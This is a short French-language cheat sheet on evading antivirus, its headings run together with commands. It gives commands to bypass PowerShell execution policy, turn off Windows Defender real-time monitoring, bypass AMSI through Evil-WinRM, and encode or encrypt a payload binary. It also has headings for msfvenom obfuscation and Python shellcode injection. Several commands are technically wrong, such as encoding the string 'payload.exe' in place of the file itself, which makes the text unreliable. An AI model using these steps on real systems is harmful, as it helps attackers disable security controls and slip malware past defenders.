Evasion AV
Powershell
powershell -ep bypass
Set-MpPreference -DisableRealtimeMonitoring $trueEvil-Winrm
# winrm
menu
Bypass-4MSIGénérer un payload encodé en Base64
echo -n "payload.exe" | base64 > payload.b64Chiffrer un binaire
openssl enc -aes-256-cbc -salt -in payload.exe -out payload_enc.exe -k secretChanger la signature binaire
mv payload.exe payload.bak && cp payload.bak payload.exe
strip --strip-debug payload.exeObfuscation avec msfvenom
Injection shellcode avec Python
Mis à jour